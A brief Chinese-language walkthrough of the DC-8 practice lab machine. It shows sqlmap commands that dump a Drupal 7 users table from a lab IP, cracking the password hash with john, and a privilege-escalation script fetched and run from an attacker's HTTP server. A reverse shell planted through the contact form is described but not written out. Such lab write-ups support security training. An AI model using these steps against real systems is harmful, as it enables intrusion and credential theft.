DC-8
难度:难、比较复杂
目标:获得root权限并读取唯一flag
信息搜集
1、使用Nmap探测靶机并进行详细扫描。
80端口:Drupal7
此版本有sql注入漏洞。
漏洞挖掘与利用
使用sqlmap进行注入攻击。
sqlmap -u http://192.168.3.46/?nid=2 --level 5 --dbs
#获取数据库名
sqlmap -u http://192.168.3.46/?nid=2 --level 5 --D d7db --tables
#获取d7db数据库的表名
sqlmap -u http://192.168.3.46/?nid=2 --level 5 -D d7db -T users --columns
#获取列名
sqlmap -u http://192.168.3.46/?nid=2 --level 5 -D d7db -T users -C name,pass --batch --dump
将hash写入john.hash,并使用john进行解密。
只破解出turtle一条密码。
通过测试得知
john:turtle
漏洞挖掘与利用
利用自带组件写入反弹shell的payload。
在cotact us界面提交信息后,将会反弹shell。
提权
发现可利用的命令。
搜索相关脚本,发现本地提权脚本。
使用python搭建简单的http服务,并在靶机shell中下载运行。
kali:
将提权脚本写到本地getshell.sh,保存后在本地开启http服务。
靶机:
第一种方式失败。
第二种方式成功。
结束。